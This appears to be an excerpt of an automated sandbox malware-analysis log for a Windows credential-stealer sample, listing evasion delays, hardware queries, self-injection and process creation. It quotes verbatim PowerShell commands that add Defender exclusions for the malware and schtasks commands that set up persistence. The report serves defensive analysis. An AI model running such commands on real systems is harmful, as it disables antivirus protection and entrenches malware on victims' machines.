                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe  Memory allocated: 3360000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe  Memory allocated: 3170000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe  Memory allocated: 1090000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe  Memory allocated: 2CD0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe  Memory allocated: 4CD0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe  Memory allocated: 6130000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe  Memory allocated: 7130000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe  Memory allocated: 7370000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe  Memory allocated: 8370000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe  Memory allocated: 1050000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe  Memory allocated: 2D00000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe  Memory allocated: 2A50000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe  Code function: 17_2_05F22019 rdtsc 17_2_05F22019
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe  Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477  (3 identical entries)
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe  Thread delayed: delay time: 922337203685477  (2 identical entries)
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe  Thread delayed: delay time: 922337203685477  (3 identical entries)
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 7905
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 822
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 8607
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 951
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe  Window / User API: threadDelayed 2006
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe  Window / User API: threadDelayed 1775
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe  Window / User API: threadDelayed 642
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe  Window / User API: threadDelayed 2146
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe TID: 1632  Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5752  Thread sleep time: -3689348814741908s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1992  Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1988  Thread sleep time: -4611686018427385s >= -30000s
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe TID: 7172  Thread sleep time: -10145709240540247s >= -30000s
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe TID: 7172  Thread sleep time: -100000s >= -30000s
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe TID: 7172  Thread sleep time: -99875s >= -30000s
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe TID: 7188  Thread sleep count: 2006 > 30
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe TID: 7188  Thread sleep count: 1775 > 30
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe TID: 7172  Thread sleep time: -99742s >= -30000s
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe TID: 7172  Thread sleep time: -99625s >= -30000s
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe TID: 7172  Thread sleep time: -99513s >= -30000s
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe TID: 7172  Thread sleep time: -99379s >= -30000s
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe TID: 7172  Thread sleep time: -99236s >= -30000s
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe TID: 7172  Thread sleep time: -99109s >= -30000s
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe TID: 7172  Thread sleep time: -98999s >= -30000s
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe TID: 7172  Thread sleep time: -98882s >= -30000s
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe TID: 7172  Thread sleep time: -98765s >= -30000s
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe TID: 7172  Thread sleep time: -98656s >= -30000s
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe TID: 7172  Thread sleep time: -98546s >= -30000s
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe TID: 7172  Thread sleep time: -98437s >= -30000s
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe TID: 7172  Thread sleep time: -98328s >= -30000s
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe TID: 7172  Thread sleep time: -98192s >= -30000s
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe TID: 7172  Thread sleep time: -98062s >= -30000s
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe TID: 7172  Thread sleep time: -97953s >= -30000s
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe TID: 7172  Thread sleep time: -97843s >= -30000s
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe TID: 7172  Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe TID: 7196  Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe TID: 7480  Thread sleep time: -8301034833169293s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe TID: 7480  Thread sleep time: -100000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe TID: 7488  Thread sleep count: 642 > 30
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe TID: 7480  Thread sleep time: -99891s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe TID: 7480  Thread sleep time: -99782s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe TID: 7488  Thread sleep count: 2146 > 30
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe TID: 7480  Thread sleep time: -99657s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe TID: 7480  Thread sleep time: -99532s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe TID: 7480  Thread sleep time: -99407s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe TID: 7480  Thread sleep time: -99297s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe TID: 7480  Thread sleep time: -99188s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe TID: 7480  Thread sleep time: -99063s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe TID: 7480  Thread sleep time: -98938s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe TID: 7480  Thread sleep time: -98813s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe TID: 7480  Thread sleep time: -98688s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe TID: 7480  Thread sleep time: -98578s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe TID: 7480  Thread sleep time: -98469s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe TID: 7480  Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe  WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe  WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe  WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe  WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe  WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe  WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Last function: Thread delayed
                      Source: C:\Windows\System32\conhost.exe  Last function: Thread delayed  (2 identical entries)
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe  Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477  (3 identical entries)
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe  Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe  Thread delayed: delay time: 100000
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe  Thread delayed: delay time: 99875
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe  Thread delayed: delay time: 99742
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe  Thread delayed: delay time: 99625
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe  Thread delayed: delay time: 99513
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe  Thread delayed: delay time: 99379
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe  Thread delayed: delay time: 99236
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeThread delayed: delay time: 99109Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeThread delayed: delay time: 98999Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeThread delayed: delay time: 98882Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeThread delayed: delay time: 98765Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeThread delayed: delay time: 98656Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeThread delayed: delay time: 98546Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeThread delayed: delay time: 98437Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeThread delayed: delay time: 98328Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeThread delayed: delay time: 98192Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeThread delayed: delay time: 98062Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeThread delayed: delay time: 97953Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeThread delayed: delay time: 97843Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeThread delayed: delay time: 100000
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeThread delayed: delay time: 99891
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeThread delayed: delay time: 99782
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeThread delayed: delay time: 99657
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeThread delayed: delay time: 99532
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeThread delayed: delay time: 99407
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeThread delayed: delay time: 99297
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeThread delayed: delay time: 99188
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeThread delayed: delay time: 99063
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeThread delayed: delay time: 98938
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeThread delayed: delay time: 98813
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeThread delayed: delay time: 98688
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeThread delayed: delay time: 98578
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeThread delayed: delay time: 98469
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeThread delayed: delay time: 922337203685477
                      Source: TuZRpLi.exe, 00000011.00000002.3268134309.0000000006110000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll-
                      Source: SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe, 00000009.00000002.3267248646.00000000069F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exeCode function: 17_2_05F22019 rdtsc 17_2_05F22019
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe"
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\TuZRpLi.exe"
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe"
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\TuZRpLi.exe"
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe | Memory written: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe | Memory written: C:\Users\user\AppData\Roaming\TuZRpLi.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe"
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\TuZRpLi.exe"
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TuZRpLi" /XML "C:\Users\user\AppData\Local\Temp\tmp8319.tmp"
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe | Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe"
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe | Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe"
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TuZRpLi" /XML "C:\Users\user\AppData\Local\Temp\tmp9170.tmp"
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe | Process created: C:\Users\user\AppData\Roaming\TuZRpLi.exe "C:\Users\user\AppData\Roaming\TuZRpLi.exe"
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe | Process created: C:\Users\user\AppData\Roaming\TuZRpLi.exe "C:\Users\user\AppData\Roaming\TuZRpLi.exe"
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe | Process created: C:\Users\user\AppData\Roaming\TuZRpLi.exe "C:\Users\user\AppData\Roaming\TuZRpLi.exe"
                      Source: C:\Users\user\AppData\Roaming\TuZRpLi.exe | Process created: C:\Users\user\AppData\Roaming\TuZRpLi.exe "C:\Users\user\AppData\Roaming\TuZRpLi.exe"
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe | Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe VolumeInformation
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
